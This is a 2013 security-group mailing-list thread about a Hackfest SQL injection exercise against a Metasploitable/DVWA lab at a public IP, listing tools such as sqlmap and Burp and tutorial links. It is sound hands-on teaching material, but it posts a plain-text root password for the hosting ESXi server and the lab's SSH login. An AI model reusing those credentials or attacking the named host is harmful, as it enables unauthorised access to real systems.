[Plug-security] SQL Injection Toyz [Flag] (Still Up/Available)
Lisa Kachold
lisakachold at obnosis.com
Sat Jun 15 20:02:07 MST 2013
Hi!
I run an VMWare ESXi server at OneNeck http://12.159.65.85
It requires that you install the vSphere client to manage it (and I can
give you a quick training session if you are interested).
If you point your browser to the ip above and download the Windows vSphere
client, you can access via (what was that password)?
Oh, Wait, it's "root" "h4ckth3b0x!" - WARNING - Do nothing unless
you are certain of what you are doing - our mantra is first do no harm.
>From access to it you can restart the virtual hosts (metasploitable) or
open a console and determine what happened --- (or I can [did]).
You can just ask me about it anytime you find it locked up (like this) and
I will fix it.
Whatever you guys were doing, you managed to FUZZ the kernel --> so the
last thing I see after opening up a console (one the tab in vSphere) to
Metaspliotable, is
kmem_cache_alloc+0x46/0xc0 SS:ESP kernel panic Fatal exception in interrupt
So, I rebooted it (right click on Metasploitable Tab).
You can also, set up your own systems with this access for next Hackfest if
you want.
On Sat, Jun 15, 2013 at 7:13 PM, Jorge Rios <jorge.rios.2981 at gmail.com>wrote:
> Hi Lisa,
>
> I've been playing with the system for the last few days and it seems to be
> down today.
>
> - Jorge
>
>
> On Thu, May 23, 2013 at 10:00 PM, Lisa Kachold <lisakachold at obnosis.com>wrote:
>
>> Well, there are a few things to attack on Metasploitable.
>>
>> There's ssh of course - but you got help there?
>> There's php holes - run Metasploitable or Armitage against it?
>> There's tikiwiki there too - to declare your flags.
>> Damn Vulnerable Linux is the Injection example.
>>
>> Here's some tutorials for use with Metasploitable 2 and Backtrack5:
>>
>> http://nkush.blogspot.com/2011/09/metasploitable-walkthrough.html
>> https://community.rapid7.com/docs/DOC-1875
>>
>>
>> On Thu, May 23, 2013 at 9:34 PM, Sam Kreimeyer <skreimey at gmail.com>wrote:
>>
>>> Thanks for the help! The ssh login was pretty useful. I was able to look
>>> at the php source code for the sql injection tab and see that magic quotes
>>> were turned on (which made for very difficult injecting!). I saw that the
>>> security cookie was defaulted to high, so I just changed that with firebug.
>>> That made things much easier!
>>>
>>> Now is there a particular flag file I should be looking for, or is this
>>> more of a sandbox to play with?
>>>
>>>
>>> On Wed, May 22, 2013 at 4:35 PM, Lisa Kachold <lisakachold at obnosis.com>wrote:
>>>
>>>> Here's the SQL Injection links:
>>>>
>>>> http://12.159.65.86/dvwa/index.php
>>>>
>>>>
>>>> On Wed, May 22, 2013 at 12:37 PM, Lisa Kachold <lisakachold at obnosis.com
>>>> > wrote:
>>>>
>>>>> You can get in via *msfadmin ssh. *
>>>>> *
>>>>> *
>>>>> *I rebooted it.*
>>>>> *
>>>>> *
>>>>> *It should answer now.
>>>>> *
>>>>> We just needed to do this:
>>>>> http://colesec.inventedtheinternet.com/metasploitable-2-and-mutillidae/
>>>>>
>>>>>
>>>>> On Wed, May 22, 2013 at 11:17 AM, Lisa Kachold <
>>>>> lisakachold at obnosis.com> wrote:
>>>>>
>>>>>> Login to the first page - the login is on the bottom of the screen
>>>>>> and restart the toy/tool.
>>>>>>
>>>>>>
>>>>>> On Wed, May 22, 2013 at 11:16 AM, Lisa Kachold <
>>>>>> lisakachold at obnosis.com> wrote:
>>>>>>
>>>>>>> Someone probably crashed the server.
>>>>>>>
>>>>>>> We can recreate it.
>>>>>>>
>>>>>>>
>>>>>>> On Tue, May 21, 2013 at 2:20 PM, Sam Kreimeyer <skreimey at gmail.com>wrote:
>>>>>>>
>>>>>>>> The error messages on the web server make it look like all the
>>>>>>>> tables have been dropped on mutillidae. Was that the injection point we
>>>>>>>> were supposed to go for?
>>>>>>>>
>>>>>>>>
>>>>>>>> On Tue, May 14, 2013 at 3:17 PM, Lisa Kachold <
>>>>>>>> lisakachold at obnosis.com> wrote:
>>>>>>>>
>>>>>>>>> We are giving the PLUG Hackfesters additional time to take this
>>>>>>>>> flag. Since SQL Injection is one of those skills that really demands
>>>>>>>>> mastery (or a good deal of experience with SQL commands such as obtained
>>>>>>>>> via DevOps or Linux Systems Administration/Engineering).
>>>>>>>>>
>>>>>>>>> The exploitable system is still up at http://12.159.65.86 -in the
>>>>>>>>> OneNeck DeVry Rack - Thanks very Much to OneNeck Hosting for
>>>>>>>>> providing this rack resource to the DeVry Students and Phoenix Open Source
>>>>>>>>> Community!
>>>>>>>>>
>>>>>>>>> There are a great number of SQL Injection tools available for your
>>>>>>>>> use:
>>>>>>>>>
>>>>>>>>> 0) https://code.google.com/p/mysqloit/
>>>>>>>>>
>>>>>>>>> 1) SQL Ninja: If you are using SQL Ninja as packaged in BT5r3,
>>>>>>>>> it's configured for use against Microsoft MSSQL and doesn't work. Our SQL
>>>>>>>>> servers are not using a SA user - and a great number of the exploits in the
>>>>>>>>> wild will be using Oracle, db2, postgresql, or mysql. You can bypass the
>>>>>>>>> (incorrectly preconfigured) version from BT5r3 (which, as a Pentesting
>>>>>>>>> distro, exists just to get you started, not to stop you when something
>>>>>>>>> doesn't work [or is broken by default because it's too powerful for the
>>>>>>>>> masses]) with http://sqlninja.sourceforge.net/ - be sure to
>>>>>>>>> follow the easy tutorial here:
>>>>>>>>> http://sqlninja.sourceforge.net/sqlninjademo.html
>>>>>>>>>
>>>>>>>>> 2) http://sqlmap.org/ (Note, you must point this to the correct
>>>>>>>>> URL where the example exploitable database is fed from a form (I.E. this
>>>>>>>>> would be found after completing the login
>>>>>>>>> http://12.159.65.86/dvwa/login.php read the page silly ). I saw
>>>>>>>>> a few of you pointing to the wrong URL/path. Some of that might be due to
>>>>>>>>> (again) the defaults in BT5r3. Here's better instructions on how to use
>>>>>>>>> the SQLmap tool (from any linux. Windows, OSX python installation):
>>>>>>>>> http://franx47.wordpress.com/2013/02/01/using-sqlmap-for-sql-injection/
>>>>>>>>> (These worked for me).
>>>>>>>>>
>>>>>>>>> 3) If you would like to attack MSSQL to delve into SQL Injection
>>>>>>>>> (as David Demland's presentation touched on to provide completeness on the
>>>>>>>>> subject of SQL Injection = especially where "sa" user is concerned), please
>>>>>>>>> see this test site:
>>>>>>>>>
>>>>>>>>> Here's content presentation that is specific to MySQL only for SQL
>>>>>>>>> Injection:
>>>>>>>>> http://www.tizag.com/mysqlTutorial/mysql-php-sql-injection.php
>>>>>>>>> For anyone at greater than basic level of SQL Injection, the differences in
>>>>>>>>> MSSQL and MYSQL (or other SQL server) are trivial (just ensure you
>>>>>>>>> understand privileges for either mysql user or sa user, and other specifics
>>>>>>>>> for db2 or Oracle for instance.
>>>>>>>>>
>>>>>>>>> 4) Of course many purists advocate use of BurpeSuite:
>>>>>>>>> http://portswigger.net/burp/ (which is available in BT5r3 {open a
>>>>>>>>> terminal window and type "locate burp"}).
>>>>>>>>>
>>>>>>>>> This is nothing like the fun that is had in [my] day to day Linux
>>>>>>>>> systems administration for mysql/postgesql/db2 (for which we generally also
>>>>>>>>> act as a "DBA") or hold key DevOps roles supporting large tanks of
>>>>>>>>> developers with ETL projects.
>>>>>>>>>
>>>>>>>>> An especially fun and powerful ETL "tool" (imagine the
>>>>>>>>> possibilities) is CloverETL: http://www.cloveretl.com/
>>>>>>>>>
>>>>>>>>> Hackfest Mentorship DISCLAIMER: We will happily assist you to
>>>>>>>>> learn or use any tool in order to complete the practical parts of the labs
>>>>>>>>> (actual encroachment). We will not teach you "how to hack" or "how to get
>>>>>>>>> a flag" other than refer you to the public lab we have available (in this
>>>>>>>>> case "Metasploitable") or ask you questions that will allow you to solve
>>>>>>>>> the tests.. Expect all of your questions to lead to more questions - we
>>>>>>>>> hope to teach you to USE THE SOURCE Luke! Google will work if you don't
>>>>>>>>> have any midi-chlorians in your blood.
>>>>>>>>>
>>>>>>>>> We especially love this "3 pronged attack" Translated by use of
>>>>>>>>> Google:
>>>>>>>>> http://translate.google.com/translate?hl=en&sl=es&u=http://www.blogtecnico.net/bt5r3-tor-burp-suite-sqlmap/&prev=/search%3Fq%3Dburpsuite%2Bon%2Bbt5r3
>>>>>>>>>
>>>>>>>>> Okay, ready, let's hit the "Blind SQL Injection" button:
>>>>>>>>> http://itsecuritylab.eu/index.php/tag/sql-injection/
>>>>>>>>>
>>>>>>>>> We decided not to use our resources for this flag....
>>>>>>>>>
>>>>>>>>> So if you want a flag just to win a prize, this one's not for you.
>>>>>>>>> Come back next month when we do IPV6.
>>>>>>>>> <http://www.cloveretl.com/>--
>>>>>>>>>
>>>>>>>>> (503) 754-4452 Android
>>>>>>>>> (623) 239-3392 Skype
>>>>>>>>> (623) 688-3392 Google Voice
>>>>>>>>> **
>>>>>>>>> it-clowns.com <http://it-clowns.com/c/index.php>
>>>>>>>>> Chief Clown
>>>>>>>>>
>>>>>>>>>
>>>>>>>>>
>>>>>>>>>
>>>>>>>>>
>>>>>>>>>
>>>>>>>>>
>>>>>>>>>
>>>>>>>>>
>>>>>>>>>
>>>>>>>>>
>>>>>>>>>
>>>>>>>>>
>>>>>>>>>
>>>>>>>>> _______________________________________________
>>>>>>>>> Plug-security mailing list - Plug-security at lists.phxlinux.org
>>>>>>>>> To change settings or unsubscribe:
>>>>>>>>> http://lists.phxlinux.org/mailman/listinfo/plug-security
>>>>>>>>>
>>>>>>>>>
>>>>>>>>
>>>>>>>> _______________________________________________
>>>>>>>> Plug-security mailing list - Plug-security at lists.phxlinux.org
>>>>>>>> To change settings or unsubscribe:
>>>>>>>> http://lists.phxlinux.org/mailman/listinfo/plug-security
>>>>>>>>
>>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>> --
>>>>>>>
>>>>>>> (503) 754-4452 Android
>>>>>>> (623) 239-3392 Skype
>>>>>>> (623) 688-3392 Google Voice
>>>>>>> **
>>>>>>> it-clowns.com <http://it-clowns.com/c/index.php>
>>>>>>> Chief Clown
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>
>>>>>>
>>>>>> --
>>>>>>
>>>>>> (503) 754-4452 Android
>>>>>> (623) 239-3392 Skype
>>>>>> (623) 688-3392 Google Voice
>>>>>> **
>>>>>> it-clowns.com <http://it-clowns.com/c/index.php>
>>>>>> Chief Clown
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>> --
>>>>>
>>>>> (503) 754-4452 Android
>>>>> (623) 239-3392 Skype
>>>>> (623) 688-3392 Google Voice
>>>>> **
>>>>> it-clowns.com <http://it-clowns.com/c/index.php>
>>>>> Chief Clown
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>>
>>>> (503) 754-4452 Android
>>>> (623) 239-3392 Skype
>>>> (623) 688-3392 Google Voice
>>>> **
>>>> it-clowns.com <http://it-clowns.com/c/index.php>
>>>> Chief Clown
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>> _______________________________________________
>>>> Plug-security mailing list - Plug-security at lists.phxlinux.org
>>>> To change settings or unsubscribe:
>>>> http://lists.phxlinux.org/mailman/listinfo/plug-security
>>>>
>>>>
>>>
>>> _______________________________________________
>>> Plug-security mailing list - Plug-security at lists.phxlinux.org
>>> To change settings or unsubscribe:
>>> http://lists.phxlinux.org/mailman/listinfo/plug-security
>>>
>>>
>>
>>
>> --
>>
>> (503) 754-4452 Android
>> (623) 239-3392 Skype
>> (623) 688-3392 Google Voice
>> **
>> it-clowns.com <http://it-clowns.com/c/index.php>
>> Chief Clown
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>> _______________________________________________
>> Plug-security mailing list - Plug-security at lists.phxlinux.org
>> To change settings or unsubscribe:
>> http://lists.phxlinux.org/mailman/listinfo/plug-security
>>
>>
>
> _______________________________________________
> Plug-security mailing list - Plug-security at lists.phxlinux.org
> To change settings or unsubscribe:
> http://lists.phxlinux.org/mailman/listinfo/plug-security
>
>
--
(503) 754-4452 Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice
**
it-clowns.com <http://it-clowns.com/d/>
Chief Clown
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.phxlinux.org/pipermail/plug-security/attachments/20130615/35444e47/attachment-0001.html>
More information about the Plug-security
mailing list